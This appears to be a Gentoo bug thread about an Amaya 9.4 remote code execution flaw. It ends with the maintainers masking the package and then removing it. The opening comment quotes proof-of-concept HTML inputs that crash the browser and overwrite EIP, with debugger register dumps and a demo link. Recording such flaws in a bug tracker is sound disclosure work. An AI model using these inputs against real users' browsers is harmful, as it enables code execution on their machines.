Amaya <= 9.4 susceptible to remote code execution. Since Amaya is unmaintained. I suggest that it be masked. """snip""" The following code snippet forces Amaya 9.4 to crash: > <legend color="Ax200"> > eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000 > edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 > > 00516114 56 push esi > 00516115 57 push edi > 00516116 33ff xor edi,edi > 00516118 33f6 xor esi,esi > 0051611a 3bcf cmp ecx,edi > 0051611c 893d943df101 mov [amaya+0x1b13d94 > (01f13d94)],edi > 00516122 7511 jnz amaya+0x116135 (00516135) > 00516124 6a0a push 0xa > 00516126 e825d80500 call amaya+0x173950 (00573950) > 0051612b 83c404 add esp,0x4 > 0051612e 8bd7 mov edx,edi > 00516130 8bc6 mov eax,esi > 00516132 5f pop edi > 00516133 5e pop esi > 00516134 c3 ret > FAULT ->00516135 8b4134 mov eax,[ecx+0x34] > ds:0023:41414175=???????? > 00516138 3bc7 cmp eax,edi > 0051613a 74f2 jz amaya+0x11612e (0051612e) > 0051613c 8b4938 mov ecx,[ecx+0x38] > 0051613f 5f pop edi > 00516140 8bd1 mov edx,ecx > 00516142 5e pop esi > 00516143 c3 ret > Nopslide.. We are able to control the EIP: > <legend color= > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAABBBB> > eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a > edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 > > Funktion: <nosymbols> > No prior disassembly possible > 42424242 ?? ??? > 42424244 ?? ??? > 42424246 ?? ??? > 42424248 ?? ??? > 4242424a ?? ??? > 4242424c ?? ??? Online-demo: http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html """snip"""
We should post a call to -dev to find some maintainer here.
Call for maintainer posted
*** Bug 130900 has been marked as a duplicate of this bug. ***
We have an ebuild but nobody wants to maintain this. I vote for masking...
I'm for masking as well.
masked it, keeping the bug open as enhancement until we have a fix or remove the package.
(In reply to comment #6) > masked it, keeping the bug open as enhancement until we have a fix or remove > the package. > treecleaners would like to remove the package.
www-client/amaya is removed!